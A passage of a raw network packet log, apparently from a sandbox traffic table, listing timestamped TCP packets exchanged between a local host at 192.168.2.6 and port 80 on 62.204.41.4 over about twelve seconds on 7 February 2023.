                          Feb 7, 2023 20:02:43.134804964 CET5011280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:43.195411921 CET805011362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:43.199352026 CET805011362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:43.201935053 CET5011380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:43.331134081 CET5011380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:43.331821918 CET5011480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:43.392267942 CET805011362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:43.393779993 CET805011462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:43.401401043 CET5011380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:43.401494980 CET5011480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:43.402147055 CET5011480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:43.463670015 CET805011462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:43.466646910 CET805011462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:43.466933012 CET5011480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:43.575198889 CET5011480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:43.576426983 CET5011580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:43.636713982 CET805011462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:43.636892080 CET5011480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:43.637703896 CET805011562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:43.637873888 CET5011580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:43.638524055 CET5011580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:43.700469017 CET805011562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:43.702280045 CET805011562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:43.702363014 CET5011580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:43.834547043 CET5011580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:43.835700989 CET5011680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:43.896092892 CET805011562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:43.896178961 CET5011580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:43.898129940 CET805011662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:43.898447990 CET5011680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:43.899560928 CET5011680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:43.962162971 CET805011662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:43.965069056 CET805011662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:43.965261936 CET5011680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:44.093024969 CET5011680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:44.093866110 CET5011780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:44.154310942 CET805011762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:44.154465914 CET5011780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:44.155621052 CET805011662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:44.155731916 CET5011680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:44.156964064 CET5011780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:44.217766047 CET805011762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:44.221028090 CET805011762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:44.221199989 CET5011780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:44.339502096 CET5011780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:44.340301037 CET5011880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:44.400120974 CET805011762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:44.400235891 CET5011780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:44.400774956 CET805011862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:44.400926113 CET5011880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:44.402579069 CET5011880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:44.463231087 CET805011862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:44.465873003 CET805011862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:44.466068983 CET5011880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:44.581347942 CET5011880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:44.582110882 CET5011980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:44.642008066 CET805011862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:44.642147064 CET5011880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:44.643652916 CET805011962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:44.643831015 CET5011980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:44.644393921 CET5011980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:44.706048965 CET805011962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:44.708594084 CET805011962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:44.708710909 CET5011980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:44.834856987 CET5011980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:44.835901022 CET5012080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:44.896588087 CET805011962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:44.896703005 CET5011980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:44.897556067 CET805012062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:44.897691965 CET5012080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:44.901957989 CET5012080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:44.963665009 CET805012062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:44.966161013 CET805012062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:44.966303110 CET5012080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:45.078435898 CET5012080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:45.079111099 CET5012180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:45.140388966 CET805012062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:45.140542984 CET805012162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:45.140552044 CET5012080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:45.140656948 CET5012180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:45.141107082 CET5012180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:45.202491999 CET805012162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:45.206444025 CET805012162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:45.207845926 CET5012180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:45.324316025 CET5012180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:45.325378895 CET5012280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:45.387048960 CET805012162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:45.387295008 CET5012180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:45.388715982 CET805012262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:45.388922930 CET5012280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:45.389627934 CET5012280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:45.452227116 CET805012262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:45.454247952 CET805012262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:45.455935955 CET5012280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:45.574395895 CET5012280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:45.575284958 CET5012380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:45.636085987 CET805012362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:45.636923075 CET805012262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:45.637219906 CET5012280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:45.637259960 CET5012380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:45.637794971 CET5012380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:45.698326111 CET805012362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:45.702547073 CET805012362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:45.702644110 CET5012380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:45.824069977 CET5012380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:45.825303078 CET5012480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:45.884835005 CET805012362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:45.884998083 CET5012380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:45.888027906 CET805012462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:45.889442921 CET5012480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:45.914006948 CET5012480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:45.976787090 CET805012462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:45.979562998 CET805012462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:45.981411934 CET5012480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:46.362128019 CET5012480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:46.363142014 CET5012580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:46.425775051 CET805012562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:46.425811052 CET805012462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:46.426067114 CET5012480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:46.426076889 CET5012580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:46.439462900 CET5012580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:46.501174927 CET805012562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:46.504683971 CET805012562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:46.504884005 CET5012580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:46.642873049 CET5012580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:46.644028902 CET5012680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:46.704596996 CET805012662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:46.704830885 CET5012680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:46.704859018 CET805012562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:46.704937935 CET5012580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:46.754868984 CET5012680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:46.815412045 CET805012662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:46.818093061 CET805012662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:46.818280935 CET5012680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:46.975929022 CET5012680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:46.977257967 CET5012780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:47.036432981 CET805012662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:47.036612988 CET5012680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:47.037924051 CET805012762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:47.038110018 CET5012780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:47.079663992 CET5012780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:47.140412092 CET805012762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:47.145004034 CET805012762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:47.145172119 CET5012780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:48.039994001 CET5012780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:48.100727081 CET805012762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:48.100931883 CET5012780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:48.144263983 CET5012880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:48.205698013 CET805012862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:48.205928087 CET5012880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:48.244683027 CET5012880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:48.305977106 CET805012862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:48.310873032 CET805012862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:48.311146021 CET5012880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:48.443540096 CET5012880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:48.444309950 CET5012980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:48.504827023 CET805012962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:48.504863977 CET805012862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:48.505059958 CET5012880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:48.505068064 CET5012980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:48.528501034 CET5012980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:48.589051008 CET805012962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:48.591860056 CET805012962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:48.592051983 CET5012980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:48.788528919 CET5012980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:48.789659023 CET5013080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:48.849100113 CET805012962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:48.849343061 CET5012980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:48.851871967 CET805013062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:48.852117062 CET5013080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:48.878882885 CET5013080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:48.941363096 CET805013062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:48.944351912 CET805013062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:48.944580078 CET5013080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:50.736287117 CET5013080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:50.737541914 CET5013180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:50.798934937 CET805013162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:50.798965931 CET805013062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:50.799233913 CET5013080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:50.801750898 CET5013180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:50.831578970 CET5013180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:50.893167973 CET805013162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:50.898102045 CET805013162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:50.898329973 CET5013180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:51.062650919 CET5013180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:51.063432932 CET5013280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:51.124150038 CET805013262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:51.124182940 CET805013162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:51.124382973 CET5013180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:51.125720978 CET5013280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:51.157887936 CET5013280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:51.219290972 CET805013262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:51.223545074 CET805013262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:51.223846912 CET5013280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:51.370217085 CET5013280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:51.371045113 CET5013380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:51.430841923 CET805013262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:51.430959940 CET5013280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:51.433315992 CET805013362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:51.433512926 CET5013380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:51.437304974 CET5013380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:51.500262022 CET805013362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:51.502486944 CET805013362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:51.502629995 CET5013380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:51.604991913 CET5013380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:51.605845928 CET5013480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:51.666363955 CET805013462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:51.666744947 CET5013480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:51.667443991 CET805013362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:51.667515993 CET5013480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:51.667587996 CET5013380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:51.727847099 CET805013462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:51.730381012 CET805013462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:51.730556011 CET5013480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:51.842036009 CET5013480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:51.843167067 CET5013580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:51.902513027 CET805013562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:51.902551889 CET805013462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:51.902709961 CET5013580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:51.902749062 CET5013480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:51.914333105 CET5013580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:51.973733902 CET805013562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:51.976408958 CET805013562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:51.976588964 CET5013580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:52.092509985 CET5013580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:52.093693018 CET5013680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:52.152106047 CET805013562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:52.152605057 CET5013580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:52.154179096 CET805013662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:52.154365063 CET5013680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:52.154927969 CET5013680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:52.215542078 CET805013662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:52.219247103 CET805013662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:52.221927881 CET5013680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:52.349446058 CET5013680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:52.350267887 CET5013780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:52.410490036 CET805013662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:52.410598993 CET5013680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:52.410671949 CET805013762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:52.410809994 CET5013780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:52.411571980 CET5013780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:52.472825050 CET805013762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:52.481930971 CET805013762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:52.484561920 CET5013780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:52.605668068 CET5013780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:52.606908083 CET5013880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:52.666204929 CET805013762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:52.668724060 CET5013780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:52.669259071 CET805013862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:52.674058914 CET5013880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:52.674592018 CET5013880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:52.737039089 CET805013862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:52.740448952 CET805013862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:52.740684986 CET5013880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:52.859308958 CET5013880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:52.860461950 CET5013980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:52.920986891 CET805013962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:52.921425104 CET5013980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:52.921865940 CET805013862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:52.924158096 CET5013880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:52.924797058 CET5013980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:52.985148907 CET805013962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:52.988130093 CET805013962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:52.988497019 CET5013980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:53.105648994 CET5013980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:53.106549978 CET5014080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:53.166054964 CET805013962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:53.166299105 CET5013980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:53.166778088 CET805014062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:53.166898966 CET5014080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:53.167783022 CET5014080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:53.228293896 CET805014062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:53.232999086 CET805014062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:53.233203888 CET5014080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:53.338872910 CET5014080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:53.339833975 CET5014180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:53.399404049 CET805014062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:53.399595976 CET5014080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:53.400083065 CET805014162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:53.400228977 CET5014180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:53.400943041 CET5014180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:53.461155891 CET805014162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:53.464102983 CET805014162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:53.464224100 CET5014180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:53.573314905 CET5014180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:53.574506044 CET5014280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:53.633651972 CET805014162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:53.633789062 CET5014180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:53.635951042 CET805014262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:53.636159897 CET5014280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:53.636956930 CET5014280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:53.698586941 CET805014262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:53.700922966 CET805014262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:53.701112032 CET5014280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:53.810801029 CET5014280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:53.811795950 CET5014380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:53.872405052 CET805014262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:53.872504950 CET5014280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:53.872994900 CET805014362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:53.873105049 CET5014380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:53.873531103 CET5014380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:53.934993982 CET805014362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:53.937649012 CET805014362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:53.937839031 CET5014380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:54.048099041 CET5014380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:54.048832893 CET5014480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:54.109638929 CET805014362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:54.109941006 CET5014380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:54.111316919 CET805014462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:54.111566067 CET5014480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:54.112123966 CET5014480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:54.174328089 CET805014462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:54.178194046 CET805014462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:54.178556919 CET5014480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:54.293981075 CET5014480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:54.295253038 CET5014580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:54.355397940 CET805014562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:54.355647087 CET5014580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:54.356239080 CET805014462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:54.356333017 CET5014480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:54.357855082 CET5014580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:54.420821905 CET805014562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:54.420859098 CET805014562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:54.421027899 CET5014580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:54.561669111 CET5014580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:54.562724113 CET5014680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:54.622004032 CET805014562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:54.622354984 CET5014580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:54.624351978 CET805014662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:54.624496937 CET5014680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:54.625344038 CET5014680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:54.686820984 CET805014662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:54.691339016 CET805014662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:54.691430092 CET5014680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:54.809210062 CET5014680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:54.810379028 CET5014780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:54.870834112 CET805014662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:54.871040106 CET5014680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:54.872580051 CET805014762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:54.872735977 CET5014780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:54.873680115 CET5014780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:54.936072111 CET805014762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:54.939722061 CET805014762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:54.939927101 CET5014780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:55.046526909 CET5014780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:55.047113895 CET5014880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:55.109015942 CET805014762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:55.109231949 CET5014780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:55.109324932 CET805014862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:55.109462976 CET5014880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:55.124322891 CET5014880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:55.187309980 CET805014862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:55.191257000 CET805014862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:55.191495895 CET5014880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:55.319998980 CET5014880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:55.320763111 CET5014980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:55.384013891 CET805014962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:55.384267092 CET5014980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:55.384988070 CET805014862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:55.385139942 CET5014880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:55.389817953 CET5014980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:55.452172995 CET805014962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:55.454595089 CET805014962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:55.454802990 CET5014980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:55.558196068 CET5014980192.168.2.662.204.41.4
